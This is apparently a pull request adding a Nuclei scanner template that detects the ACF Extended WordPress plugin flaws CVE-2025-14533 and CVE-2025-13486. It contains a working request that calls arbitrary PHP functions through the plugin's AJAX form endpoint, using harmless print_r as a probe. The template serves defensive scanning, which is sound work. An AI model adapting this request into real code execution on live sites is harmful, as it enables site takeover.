### PR TITLE
Add CVE-2025-14533 - ACF Extended Unauthenticated Privilege Escalation

### DIFF
--- a/http/cves/2025/CVE-2025-14533.yaml
+++ b/http/cves/2025/CVE-2025-14533.yaml
@@ -1,0 +1,62 @@
+id: CVE-2025-14533
+
+info:
+  name: Advanced Custom Fields Extended <= 0.9.2.1 - Unauthenticated Privilege Escalation
+  author: bswearingen
+  severity: critical
+  description: |
+    The Advanced Custom Fields Extended (ACFE) plugin for WordPress is vulnerable to Privilege Escalation in all versions up to and including 0.9.2.1. The 'insert_user' function does not restrict the roles with which a user can register, allowing unauthenticated attackers to create administrator accounts. This template detects vulnerable ACFE installations by testing the AJAX form rendering endpoint which accepts arbitrary PHP function names via call_user_func_array, confirming the plugin is vulnerable to both CVE-2025-14533 (privilege escalation) and the related CVE-2025-13486 (RCE).
+  impact: |
+    An unauthenticated attacker can create administrator accounts, leading to full WordPress site compromise including data theft, malware injection, and complete control over site content and settings.
+  remediation: Update the Advanced Custom Fields Extended plugin to a version newer than 0.9.2.1.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-14533
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-13486
+    - https://thecyberexpress.com/acf-add-on-vulnerability-wordpress/
+    - https://github.com/0xgh057r3c0n/CVE-2025-13486
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2025-14533
+    cwe-id: CWE-269
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: acf-extended
+    product: acf-extended
+    shodan-query: http.component:"WordPress"
+  tags: cve,cve2025,wordpress,wp-plugin,acf-extended,acfe,privilege-escalation,rce,unauth
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        action=acfe%2Fform%2Frender_form_ajax&nonce={{nonce}}&form%5Brender%5D=print_r&form%5Bcustom_payload%5D={{randstr_marker}}
+
+    extractors:
+      - type: regex
+        name: nonce
+        part: body
+        group: 1
+        regex:
+          - '"nonce"\s*:\s*"([a-f0-9]+)"'
+          - 'acf[._]nonce["\s:]+["\s]*([a-f0-9]+)'
+        internal: true
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_2
+        words:
+          - "{{randstr_marker}}"
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### PR Information

- Added CVE-2025-14533
- Advanced Custom Fields Extended (ACFE) plugin for WordPress <= 0.9.2.1 allows unauthenticated privilege escalation via the `insert_user` function which does not restrict user roles during registration. This template detects vulnerable installations by testing the ACFE AJAX form rendering endpoint (`acfe/form/render_form_ajax`) which accepts arbitrary PHP function names via `call_user_func_array`, confirming exploitability.
- 100k+ active WordPress installations affected. Actively exploited in the wild.
- References:
  - https://nvd.nist.gov/vuln/detail/CVE-2025-14533
  - https://nvd.nist.gov/vuln/detail/CVE-2025-13486
  - https://github.com/0xgh057r3c0n/CVE-2025-13486

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details

Template uses a two-step flow: extracts the ACF nonce from the homepage, then calls the ACFE AJAX form render endpoint with `print_r` as the function name and a random marker string as payload. If the marker is reflected in the response, the arbitrary function execution is confirmed, proving the plugin is vulnerable to both privilege escalation (CVE-2025-14533) and RCE (CVE-2025-13486).

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)